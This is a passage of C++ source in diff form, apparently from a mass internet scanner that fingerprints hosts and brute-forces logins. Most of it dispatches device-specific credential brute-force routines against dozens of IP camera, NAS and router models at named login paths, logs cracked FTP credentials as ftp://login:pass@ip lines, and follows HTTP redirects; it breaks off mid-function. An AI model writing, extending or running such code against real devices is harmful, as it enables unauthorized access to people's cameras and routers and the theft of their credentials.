"Set-Cookie:") != NULL) strncpy(ps.cookie, _getAttribute(buffcpy, "Set-Cookie:"), COOKIE_MAX_SIZE); + }; + + strcpy(port, itoa(p, b, 10)); + + if(strstr(finalstr, ps.headr) == NULL) strcat(finalstr, ps.headr); + if(flag == -1 || flag == 6 || strstr(finalstr, "[IGNR_ADDR]") != NULL) return -1; + +#pragma region Fillers + if(flag == 16) + { + Connector con; + isActive = 1; + + char log[2048] = {0}; + char logEmit[2048] = {0}; + + strcpy(logEmit, "[FTP]:"); + strcpy(log, "[FTP]:"); + strcat(log, ip); + strcat(log, ":"); + strcat(log, port); + strcat(log, ""); + strcat(log, "; Received: "); + strncat(log, std::to_string(recd).c_str(), 100); + + lps = con._FTPLobby(ip, p, &ps); + + if(strstr(lps.other, "ROUTER") != NULL) + { + ++PieBA; + strcat(log, "ftp://"); + strcat(log, lps.login); + strcat(log, ":"); + strcat(log, lps.pass); + strcat(log, "@"); + strcat(log, ip); + strcat(log, " [ROUTER]"); + strcat(log, ps.headr); + + strcat(logEmit, "ftp://"); + strcat(logEmit, lps.login); + strcat(logEmit, ":"); + strcat(logEmit, lps.pass); + strcat(logEmit, "@"); + strcat(logEmit, ip); + strcat(logEmit, " [ROUTER]"); + + fputsf (ip, port, log, flag, "FTP"); + + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), "[FTP service]", lps.login, lps.pass, "Router FTP detected.", cp, "FTP"); + + + #pragma region QTGUI_Area + stt->doEmitionFoundData(QString::fromLocal8Bit(logEmit)); +#pragma endregion + } + else if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + { + ++PieBA; + strcat(log, "ftp://"); + strcat(log, lps.login); + strcat(log, ":"); + strcat(log, lps.pass); + strcat(log, "@"); + strcat(log, ip); + strcat(log, ""); + strcat(log, ps.headr); + + strcat(logEmit, "ftp://"); + strcat(logEmit, lps.login); + strcat(logEmit, ":"); + strcat(logEmit, lps.pass); + strcat(logEmit, "@"); + strcat(logEmit, ip); + strcat(logEmit, " (F:"); + strcat(logEmit, std::to_string(ps.directoryCount).c_str()); + strcat(logEmit, ")"); + + fputsf(ip, port, log, flag, "FTP"); + + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), "[FTP service]", lps.login, lps.pass, "NULL", cp, "FTP"); +#pragma region QTGUI_Area + stt->doEmitionFoundData(QString::fromLocal8Bit(logEmit)); +#pragma endregion + } + else if(strstr(lps.login, "Unknown protocol") != NULL) + { + strcat(log, "; [!] USER/PASS commands failed. Dunno what to do."); + fputsf(ip, port, log, flag, ""); + +#pragma region QTGUI_Area + stt->doEmitionFoundData(QString::fromLocal8Bit(log)); +#pragma endregion + }; + } + else if(flag == 21) //Eyeon + { + _specBrute(ps.cookie, ip, p, hl, "Eyeon Camera", flag, "/user/index.htm", "Eyeon Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 22) //IP Camera control + { + _specBrute(ps.cookie, ip, p, hl, "IP camera Control webpage", flag, "/main/cs_motion.asp", "IP Camera Control", "Basic Authorization", cp, recd, ""); + } + else if(flag == 23) //Network Camera BB-SC384 + { + _specBrute(ps.cookie, ip, p, hl, "Network Camera BB-SC384", flag, "/live/index2.html", "Network Camera BB-SC384", "Basic Authorization", cp, recd, ""); + } + else if(flag == 24) //Network Camera VB-M40 + { + _specBrute(ps.cookie, ip, p, hl, "Network Camera VB-M40", flag, "/-wvhttp-01-/open.cgi?", "Network Camera VB-M40", "Basic Authorization", cp, recd, ""); + } + else if(flag == 25) //Panasonic WTFISTHISAreaOMGIDONTEVEN-camera + { + _specBrute(ps.cookie, ip, 60002, hl, "Panasonic WTFISTHISAreaOMGIDONTEVEN-camera", flag, "/SnapshotJPEG", "Panasonic WTFISTHISAreaOMGIDONTEVEN-camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 26) //Sony Network Camera + { + _specBrute(ps.cookie, ip, p, hl, "Sony Network Camera", flag, "/oneshotimage?", "Sony Network Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 27) //UA Network Camera + { + _specBrute(ps.cookie, ip, p, hl, "UA Network Camera", flag, "/webs.cgi?", "UA Network Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 28) //Network Camera VB-M40 + { + _specBrute(ps.cookie, ip, p, hl, "Network Camera VB-??", flag, "/-wvhttp-01-/open.cgi?", "Network Camera VB-??", "Basic Authorization", cp, recd, ""); + } + else if(flag == 29) //LG Smart IP Device + { + _specBrute(ps.cookie, ip, p, hl, "LG Smart IP Device Camera", flag, "/digest.php", "LG Smart IP Device Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 30) //NAS + { + _specBrute(ps.cookie, ip, p, hl, "NAS", flag, "/cgi-bin/data/viostor-220/viostor/viostor.cgi", "NAS", "Basic Authorization", cp, recd, ""); + } + else if(flag == 31) //ip cam + { + _specBrute(ps.cookie, ip, p, hl, "IP Camera", flag, "/check_user.cgi", "IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 32) //IPC WEB ip cam + { + _specWEBIPCAMBrute(ip, p, hl, "[IPC] WEB IP Camera", flag, "[IPC] WEB IP Camera", "WEB Authorization", cp, recd, "IPC"); + } + else if(flag == 33) //GEOvision ip cam + { + _specWEBIPCAMBrute(ip, p, hl, "[GEO] WEB IP Camera", flag, "[GEO] WEB IP Camera", "WEB Authorization", cp, recd, "GEO"); + } + else if(flag == 34) //Hikvision ip cam + { + _specBrute(ps.cookie, ip, p, hl, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[Hikvision] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 35) //EasyCam + { + _specWEBIPCAMBrute(ip, p, hl, "[EasyCam] WEB IP Camera", flag, "[EasyCam] WEB IP Camera", "WEB Authorization", cp, recd, "EasyCam"); + } + else if(flag == 36) //Panasonic Cam + { + _specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/config/index.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 37) //Panasonic Cam + { + _specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/view/getuid.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 38) //Foscam + { + _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Web Authorization", cp, recd, "Foscam"); + } + else if(flag == 39) //EagleEye + { + _specBrute(ps.cookie, ip, p, hl, "[EagleEye] IP Camera", flag, "/cgi-bin/guest/Video.cgi?", "[EagleEye] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 40) //Network Camera VB-C?? + { + _specBrute(ps.cookie, ip, p, hl, "[Network Camera VB-C??] IP Camera", flag, "/admin/index.shtml?", "[Network Camera VB-C??] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 41) //AVIOSYS-camera + { + _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Web Authorization", cp, recd, "AVIOSYS"); + } + else if(flag == 42) //NW_camera + { + _specBrute(ps.cookie, ip, p, hl, "[NW_camera] IP Camera", flag, "/cgi-bin/getuid?FILE=indexnw.html", "[NW_camera] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 43) //NW_camera + { + _specBrute(ps.cookie, ip, p, hl, "[Micros] IP Camera", flag, "/gui/rem_display.shtml", "[Micros] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 44) //Hikvision ip cam 2 + { + _specBrute(ps.cookie, ip, p, hl, "[Hikvision] IP Camera", flag, "/ISAPI/Security/userCheck", "[Hikvision] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 45) //Panasonic ip cam + { + _specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/config/index.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 46) //Buffalo disk + { + _specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO"); + } + else if(flag == 47) //Digital Video Server + { + _specWEBIPCAMBrute(ip, p, hl, "[DVS] Camera", flag, "[DVS] Camera", "Web Authorization", cp, recd, "DVS"); + } + else if(flag == 48) //ipCAM + { + _specWEBIPCAMBrute(ip, p, hl, "[ipCAM] Camera", flag, "[ipCAM] Camera", "Web Authorization", cp, recd, "IPCAM"); + } + else if(flag == 49) //IEORFOREFOX + { + _specWEBIPCAMBrute(ip, p, hl, "[IEORFOREFOX] Camera", flag, "[IEORFOREFOX] Camera", "Web Authorization", cp, recd, "IEORFOREFOX"); + } + else if(flag == 20) //AXIS Camera + { + _specBrute(ps.cookie, ip, p, hl, "AXIS Camera", flag, "/axis-cgi/com/ptz.cgi?", "AXIS Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 19) //reecam cameras + { + _specBrute(ps.cookie, ip, p, hl, "Reecam (network camera)", flag, "/videostream.cgi", "ReeCam camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 18) //linksys camera + { + _specBrute(ps.cookie, ip, p, hl, "Linksys camera", flag, "/img/main.cgi", "Linksys camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 17) //Real-time IP Camera Monitoring System + { + _specBrute(ps.cookie, ip, p, hl, "Real-time IP Camera Monitoring System", flag, "/live.htm", "Real-time IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 11) + { + _specBrute(ps.cookie, ip, p, hl, "Netwave IP Camera", flag, "/videostream.cgi", "Netwave IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 12) + { + _specBrute(ps.cookie, ip, p, hl, "IP Camera", flag, "/view/view.shtml?videos=", "IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 13) + { + _specBrute(ps.cookie, ip, p, hl, "IP Camera", flag, "/eng/view/indexjava.html", "IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 14) + { + _specBrute(ps.cookie, ip, p, hl, "IP Camera", flag, "/rdr.cgi", "IP Camera", "Basic Authorization", cp, recd, ""); + } + else if(flag == 15) //For HFS + { + char temp[64] = {0}; + char log[512] = {0}; + Connector con; + isActive = 1; + ++AnomC1; + + strcpy(log, "[HFS]:"); + strcat(log, hl); + strcat(log, " :: "); + strcat(log, ip); + strcat(log, ":"); + strcat(log, port); + strcat(log, " T: "); + strcat(log, finalstr); + strcat(log, " Pass: "); + lps = con._BALobby(ps.cookie, ip, p, "/~login", "[NORMAL]", ""); + strcat(log, lps.login); + strcat(log, ":"); + strcat(log, lps.pass); + strcat(log, ""); + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), finalstr, lps.login, lps.pass, "HFS-FTP", cp, "Basic Authorization"); + fputsf (ip, port, log , flag, "HFS"); + stt->doEmitionFoundData(QString::fromLocal8Bit(log)); + ZeroMemory(temp, sizeof(temp)); + } + else if(flag == 1) + { + _specBrute(ps.cookie, ip, p, hl, finalstr, flag, pps, "[NORMAL]", "Basic Authorization", cp, recd, ""); + } + else if(flag == 101) + { + _specBrute(ps.cookie, ip, p, hl, finalstr, flag, pps, "[DIGEST]", "Basic Authorization", cp, recd, buffcpy); + } + else if(flag == 10) + { + _specWFBrute(ip, p, hl, rBuff, flag, pps, "Web Form", "Web Form", cp, recd, finalstr); + } + else + { + putInFile(flag, ip, port, recd, finalstr, hl, cp); + }; +#pragma endregion + + return flag; +}; + +const char *rbuff1 = "GET "; +const char *rbuff2 = " HTTP/1.1\r\nHost: "; +const char *rbuff3 = "\r\nCookie:"; +const char *rbuff4 = "\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n\r\n"; + +int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, PathStr *ps, std::vector *redirStrLst, char *buff) +{ + if(ls->iterationCount++ == 5) + { + ls->iterationCount = 0; + + strcpy(ps->headr, "[!][Loop detected.]"); + strcpy(ps->path, ""); + + return 0; + }; + + Connector con; + char tempIP[MAX_ADDR_LEN] = {0}; + strcpy(tempIP, ip); + int tempPort = port; + char tempPath[1024] = {0}; + char mes[2048]= {0}; + + if(strstri(str, "https://") != NULL) + { + tempPort = 443; + char *ptr1 = strstri(str, "https://"); + char *ptr2 = _findFirst(str + 8, ":/?"); + if(ptr2 != NULL) + { + int sz = ptr2 - ptr1 - 8; + ZeroMemory(tempIP, MAX_ADDR_LEN); + strncpy(tempIP, ptr1 + 8, sz < 128 ? sz : 128); + if(ptr2[0] == ':') + { + char *ptrPath = strstr(ptr2, "/"); + if(ptrPath != NULL) + { + sz = ptrPath - ptr2 - 1; + + char *pPth = strstr(ptr1 + 8, "/"); + strcpy(tempPath, pPth); + } + else + { + strcpy(tempPath, "/"); + sz = ptr2 - ptr1 - 9; + }; + char tPort[8] = {0}; + strncpy(tPort, ptr2 + 1, sz < 8 ? sz : 5); + tempPort = atoi(tPort); + } + else if(ptr2[0] == '/') + { + strncpy(tempPath, ptr2, strlen(ptr2)); + } + else if(ptr2[0] == '?') + { + strcpy(tempPath, "/"); + strncat(tempPath, ptr2, strlen(ptr2)); + } + else + { + stt->doEmitionRedFoundData("[Redirect] Unknown protocol (" + QString(ip) + ":" + QString::number(port) + ")"); + }; + } + else + { + ZeroMemory(tempIP, MAX_ADDR_LEN); + strncpy(tempIP, ptr1 + 8, strlen(str) - 8); + strcpy(tempPath, "/"); + }; + + strcpy(mes, rbuff1); + if(tempPath[0] != '/') strcat(mes, "/"); + strcat(mes, tempPath); + strcat(mes, rbuff2); + strcat(mes, tempIP); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } + if(strlen(cookie) != 0) + { + strcat(mes, rbuff3); + strcat(mes, cookie); + }; + strcat(mes, rbuff4); + + conSTR cstr; + cstr.size = 0; + cstr.lowerBuff = NULL; + if(con._EstablishSSLConnection(tempIP, tempPort, mes, &cstr) > -1) + { + strncpy(buff, cstr.lowerBuff, (cstr.size < 65535 ? cstr.size : 65535)); + strcpy(ps->codepage, GetCodePage(cstr.lowerBuff)); + + ls->flag = ContentFilter(cstr.lowerBuff, tempPort, tempIP, ps->codepage); + ps->flag = ls->flag; + + if(ls->flag == -1) + { + ps->flag = -1; + strcpy(ps->headr, "[IGNR_ADDR]"); + strcpy(ps->path, tempPath); + delete []cstr.lowerBuff; + + return 0; + }; + if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 + || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) + { + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ps->flag = ls->flag; + strcpy(ps->path, tempPath); + ps->port = tempPort; + strcpy(ps->ip, tempIP); + + delete []cstr.lowerBuff; + + return ls->flag; + }; + if(ls->flag == 6) + { + ps->flag = ls->flag; + ps->port = tempPort; + return ls->flag; + }; + strcat(ps->headr, " -> "); + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ls->_header(tempIP, tempPort, cstr.lowerBuff, ls, ps, redirStrLst, buff); + ps->port = tempPort; + if(strlen(cstr.lowerBuff) < 1) + { + ps->flag = 3; + ls->flag = 3; + } + else if(cstr.overflow == true) + { + ls->flag = 0; + ps->flag = 0; + }; + + delete []cstr.lowerBuff; + } + else + { + ps->flag = -1; + ls->flag = -1; + if(gNegDebugMode) stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Rejecting in _header::redirect [Dead host]."); + }; + + return 0; + } + else if(strstr(str, "http://") != NULL) //http + { + char *ptr1 = strstri(str, "http://"); + char *ptr2 = _findFirst(str + 7, ":/?"); + if(ptr2 != NULL) + { + int sz = ptr2 - ptr1 - 7; + ZeroMemory(tempIP, MAX_ADDR_LEN); + strncpy(tempIP, ptr1 + 7, sz < 128 ? sz : 128); + if(ptr2[0] == ':') + { + char *ptrPath = strstr(ptr2, "/"); + if(ptrPath != NULL) + { + sz = ptrPath - ptr2 - 1; + + char *pPth = strstr(ptr1 + 7, "/"); + strcpy(tempPath, pPth); + } + else + { + strcpy(tempPath, "/"); + sz = ptr2 - ptr1 - 7; + }; + char tPort[8] = {0}; + strncpy(tPort, ptr2 + 1, sz < 8 ? sz : 5); + tempPort = atoi(tPort); + } + else if(ptr2[0] == '/') + { + strncpy(tempPath, ptr2, strlen(ptr2)); + } + else if(ptr2[0] == '?') + { + strcpy(tempPath, "/"); + strncat(tempPath, ptr2, strlen(ptr2)); + } + else + { + stt->doEmitionRedFoundData("[Redirect] Unknown protocol (" + QString(ip) + ":" + QString::number(port) + ")"); + }; + } + else + { + ZeroMemory(tempIP, MAX_ADDR_LEN); + strncpy(tempIP, ptr1 + 7, strlen(str) - 7); + strcpy(tempPath, "/"); + }; + + if(tempPort == 0) tempPort = port; + strcpy(mes, rbuff1); + if(tempPath[0] != '/') strcat(mes, "/"); + strcat(mes, tempPath); + strcat(mes, rbuff2); + strcat(mes, tempIP); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } + if(strlen(cookie) != 0) + { + strcat(mes, rbuff3); + strcat(mes, cookie); + }; + strcat(mes, rbuff4); + + conSTR cstr; + cstr.size = 0; + cstr.lowerBuff = NULL; + if(con._EstablishConnection(tempIP, tempPort, mes, &cstr) > -1) + { + strncpy(buff, cstr.lowerBuff, (cstr.size < 65535 ? cstr.size : 65535)); + strcpy(ps->codepage, GetCodePage(cstr.lowerBuff)); + + ls->flag = ContentFilter(cstr.lowerBuff, tempPort, tempIP, ps->codepage); + ps->flag = ls->flag; + + if(ls->flag == -1) + { + ps->flag = -1; + strcpy(ps->headr, "[IGNR_ADDR]"); + strcpy(ps->path, tempPath); + delete []cstr.lowerBuff; + + return -1; + }; + if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 + || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) + { + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ps->flag = ls->flag; + strcpy(ps->path, tempPath); + delete []cstr.lowerBuff; + ps->port = tempPort; + strcpy(ps->ip, tempIP); + + return ls->flag; + }; + if(ls->flag == 6) + { + ps->flag = ls->flag; + ps->port = tempPort; + return ls->flag; + }; + strcat(ps->headr, " -> "); + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ls->_header(tempIP, tempPort, cstr.lowerBuff, ls, ps, redirStrLst, buff); + ps->port = tempPort; + + if(strlen(cstr.lowerBuff) < 1) + { + ps->flag = 3; + ls->flag = 3; + } + else if(cstr.overflow == true) + { + ls->flag = 0; + ps->flag = 0; + }; + + delete []cstr.lowerBuff; + } + else + { + ps->flag = -1; + ls->flag = -1; + if(gNegDebugMode) stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Rejecting in _header::redirect [Dead host]."); + }; + return 0; + } + else if(str[0] == '/' || (str[0] == '.' && str[1] == '/') || (str[0] == '.' && str[1] == '.' && str[2] == '/')) + { + if(str[0] == '.' && str[1] == '.') strcpy(tempPath, str + 2); + else if(str[0] == '.') strcpy(tempPath, str + 1); + else strcpy(tempPath, str); + + strcpy(mes, rbuff1); + if(tempPath[0] != '/') strcat(mes, "/"); + strcat(mes, tempPath); + strcat(mes, rbuff2); + strcat(mes, ip); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } + if(strlen(cookie) != 0) + { + strcat(mes, rbuff3); + strcat(mes, cookie); + }; + strcat(mes, rbuff4); + + conSTR cstr; + cstr.size = 0; + cstr.lowerBuff = NULL; + int cRes = 0; + if(port == 443) cRes = con._EstablishSSLConnection(ip, 443, mes, &cstr); + else cRes = con._EstablishConnection(ip, port, mes, &cstr); + if(cstr.size < 65535) + { + strncpy(buff, cstr.lowerBuff, cstr.size); + } + else + { + strncpy(buff, cstr.lowerBuff, 65535); + }; + if(cRes > -1) + { + strcpy(ps->codepage, GetCodePage(cstr.lowerBuff)); + + ls->flag = ContentFilter(cstr.lowerBuff, port, ip, ps->codepage); + ps->flag = ls->flag; + + if(ls->flag == -1) + { + ps->flag = -1; + strcpy(ps->headr, "[IGNR_ADDR]"); + strcpy(ps->path, tempPath); + delete []cstr.lowerBuff; + + return -2; + }; + if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 + || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) + { + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ps->flag = ls->flag; + strcpy(ps->path, tempPath); + delete []cstr.lowerBuff; + ps->port = port; + strcpy(ps->ip, ip); + + return ls->flag; + }; + if(ls->flag == 6) + { + ps->flag = ls->flag; + ps->port = tempPort; + return ls->flag; + }; + strcat(ps->headr, "->"); + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ls->_header(ip, port, cstr.lowerBuff, ls, ps, redirStrLst, buff); + ps->port = tempPort; + if(strlen(cstr.lowerBuff) < 1) + { + ps->flag = 3; + ls->flag = 3; + } + else if(cstr.overflow == true) + { + ls->flag = 0; + ps->flag = 0; + }; + + delete []cstr.lowerBuff; + } + else + { + ps->flag = -1; + ls->flag = -1; + if(gNegDebugMode) stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Rejecting in _header::redirect [Dead host]."); + }; + return 0; + } + else if(strlen(str) > 2) + { + strcpy(tempPath, str); + strcpy(mes, rbuff1); + if(tempPath[0] != '/') strcat(mes, "/"); + strcat(mes, tempPath); + strcat(mes, rbuff2); + strcat(mes, ip); + if(tempPort != 80){ + strcat(mes, ":"); + char tbuff[16] = {0}; + strcat(mes, itoa(tempPort, tbuff, 10)); + } + if(strlen(cookie) != 0) + { + strcat(mes, rbuff3); + strcat(mes, cookie); + }; + strcat(mes, rbuff4); + + conSTR cstr; + cstr.size = 0; + cstr.lowerBuff = NULL; + if(con._EstablishConnection(ip, port, mes, &cstr) != -1) + { + strncpy(buff, cstr.lowerBuff, (cstr.size < 65535 ? cstr.size : 65535)); + strcpy(ps->codepage, GetCodePage(cstr.lowerBuff)); + + ls->flag = ContentFilter(cstr.lowerBuff, port, ip, ps->codepage); + ps->flag = ls->flag; + if(ls->flag == -1) + { + ps->flag = -1; + strcpy(ps->headr, "[IGNR_ADDR]"); + strcpy(ps->path, tempPath); + delete []cstr.lowerBuff; + + return -1; + }; + if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 + || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) + { + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ps->flag = ls->flag; + strcpy(ps->path, tempPath); + delete []cstr.lowerBuff; + ps->port = port; + strcpy(ps->ip, ip); + + return ls->flag; + }; + if(ls->flag == 6) + { + ps->flag = ls->flag; + ps->port = tempPort; + return ls->flag; + }; + strcat(ps->headr, " -> "); + strcat(ps->headr, GetTitle(cstr.lowerBuff)); + ls->_header(ip, port, cstr.lowerBuff, ls, ps, redirStrLst, buff); + ps->port = tempPort; + + if(strlen(cstr.lowerBuff) < 1) + { + ps->flag = 3; + ls->flag = 3; + } + else if(cstr.overflow == true) + { + ls->flag = 0; + ps->flag = 0; + }; + + delete []cstr.lowerBuff; + } + else + { + ps->flag = -1; + ls->flag = -1; + if(gNegDebugMode) stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Rejecting in _header::redirect [Dead host]."); + }; + return 0; + }; + + return -1; +}; +void _getPopupTitle(PathStr *ps, char *str) +{ + char res[32] = {0}; + + strcat(ps->headr, "[Popup detected. Title: "); + + char *ptr1 = strstr(str, ","); + if(ptr1 != NULL) + { + char *ptr2 = strstr(ptr1 + 1, ","); + if(ptr2 != NULL) + { + int sz = ptr2 - ptr1 - 1; + if(sz >= 32) sz = 32; + + strncat(ps->headr, ptr1 + 1, sz < 32 ? sz : 32); + } + else + { + strcat(ps->headr, "[BOUNDARY ERROR]"); + }; + } + else + { + char temp[32] = {0}; + if(strstr(str, "(") != NULL){ + strncpy(temp, strstr(str, "("), 32); + strcat(ps->headr, temp); + } else { + strcat(ps->headr, "[No title]"); + }; + }; + + strcat(ps->headr, "]"); +}; +void _getLinkFromJSLocation(char *dataBuff, char *str, char *tag, char *ip, int port) +{ + char *ptr1 = strstr(str, tag); + if(ptr1 != NULL) + { + char *ptr2 = _findFirst(ptr1, "=("); + char *ptrSemi = _findFirst(ptr1 + strlen(tag), ".;"); + if(ptrSemi == NULL) + { + ptrSemi = _findLast(ptr1 + strlen(tag) + 1, "'\""); + } + if(ptr2 != NULL && ptrSemi != NULL) + { + int sz = ptrSemi - ptr2; + if(sz >= 2) + { + char *ptrQuote1 = _findFirst(ptr2, "\"'"); + if(ptrQuote1 != NULL) + { + char *ptrQuoteTemp = _findFirst(ptrQuote1 + 1, ";\n}"); + if(ptrQuoteTemp != NULL) + { + sz = ptrQuoteTemp - ptrQuote1 + 1; + } + else + { + ptrQuoteTemp = _findFirst(ptrQuote1 + 1, "\"'"); + sz = ptrQuoteTemp - ptrQuote1 + 1; + } + char *tempBuff = new char[sz + 1]; + ZeroMemory(tempBuff, sizeof(tempBuff)); + strncpy(tempBuff, ptrQuote1 + 1, sz); + memset(tempBuff + sz, 0, 1); + char delim[2] = {0}; + ZeroMemory(delim, 1); + delim[0] = ptrQuote1[0]; + delim[1] = '\0'; + + char *ptrQuote2 = _findLast(tempBuff + 1, delim); + if(ptrQuote2 != NULL) + { + sz = ptrQuote2 - tempBuff; + char link[512] = {0}; + if(sz < 511) + { + if (tempBuff[0] == '.' && tempBuff[1] == '/') + { + strncat(dataBuff, tempBuff + 1, sz - 1); + } + else if(tempBuff[0] != '/' + && strstri(tempBuff, "http://") == NULL + && strstri(tempBuff, "https://") == NULL + ) + { + strcpy(dataBuff, "/"); + strncat(dataBuff, tempBuff + 1, sz - 1); + } + else strncpy(dataBuff, tempBuff, sz); + }; + }; + delete tempBuff; + } + else + { + ptrQuote1 = strstr(ptr2, "="); + if(ptrQuote1 != NULL) + { + char *ptrQuote2 = _findFirst(ptr2, ";\n"); + if(ptrQuote2 != NULL) + { + int sz = ptrQuote2 - ptr2 - 1; + char link1[512] = {0}; + strncpy(link1, ptr2 + 1, sz); + char *ptrQuote3 = strstr(link1, "/"); + if(ptrQuote3 != NULL) + { + char link[512] = {0}; + strcpy(dataBuff, ptrQuote3); + }; + }; + }; + }; + }; + } + else + { + stt->doEmitionRedFoundData("[JSLocator] _findFirst failed [" + QString(ip) + ":" + QString::number(port) + "]"); + }; + }; +}; +void _getJSCookie(char *dataBuff, char *str, char *ip, int port) +{ + char *ptr1 = strstri(str, "document.cookie"); + if(ptr1 != NULL) + { + char *ptr2 = _findFirst(ptr1, "\"'"); + if(ptr2 != NULL) + { + char *ptr3 = _findFirst(ptr2 + 1, "\"'"); + if(ptr3 != NULL) + { + int sz = ptr3 - ptr2 - 1; + if(sz < 1024) strncpy(dataBuff, ptr2 + 1, sz); + else + { + stt->doEmitionRedFoundData("[_getJSCookie] Cookie exceeds max value [" + QString(ip) + ":" + QString::number(port) + "]"); + }; + }; + }; + }; +}; +int Lexems::_header(char *ip, int port, char str[], Lexems *l, PathStr *ps, std::vector *redirStrLst, char *rBuff) +{ + std::string redirectStr = ""; + if(strstr(str, "Set-Cookie:") != NULL) strncpy(ps->cookie, _getAttribute(str, "Set-Cookie:"), COOKIE_MAX_SIZE); + +#pragma region Prechecks + if(strstr(str, "[IGNR_ADDR]") != NULL) + { + if(gNegDebugMode) stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Rejecting in _header::Precheck."); + strcpy(ps->headr, "[IGNR_ADDR]"); + strcpy(ps->path, "/"); + return 0; + }; + + strcpy(ps->codepage, GetCodePage(str)); + + if(strstr(str, "[CONN_LOWLOAD_OMG]") != NULL) + { + strcpy(ps->headr, "[CONN_LOWLOAD_OMG]"); + strcpy(ps->path, "/"); + return 0; + }; + + if(strlen(str) == 0) + { + strcpy(ps->headr, "[No data!]"); + strcpy(ps->path, "/"); + return 0; + }; + + char *secondStr, *firstStr, *tempStr, finalstr[512] = {0}; + + if(strstri(str, "notice auth :*** looking up your hostname...") + || strstri(str, "451 * :You have not registered.") + ) + { + strcpy(ps->headr, "[IRC server]"); + strcpy(ps->path, "/"); return 1; + }; + if(strstri(str, "ip camera") != NULL || strstri(str, "+tm01+") != NULL + || strstri(str, "camera web server") != NULL || strstri(str, "ipcam_language") != NULL + || strstri(str, "/viewer/video.jpg") != NULL || strstri(str, "network camera") != NULL + || strstri(str, "sanpshot_icon") != NULL || strstri(str, "snapshot_icon") != NULL + || strstri(str, "lan camera") != NULL || strstri(str, "cgiuserlogin?") != NULL + || strstri(str, "web camera") != NULL || strstri(str, "smart ip device") != NULL + || strstri(str, "pan/tilt camera") != NULL || strstri(str, "/cgi-bin/viewer/getparam.cgi?") != NULL + || strstri(str, "IPCamera") != NULL + ) + { + strcpy(ps->headr, "[IP Camera detected]"); + l->flag = 0; + ps->flag = 0; + }; + if(strstri(str, "get_status.cgi") != NULL) + { strcpy(ps->headr, "[It may be ip camera]"); }; + if(strstri(str, "vo_logo.gif") != NULL + || strstri(str, "vo logo.gif") != NULL + ) + { 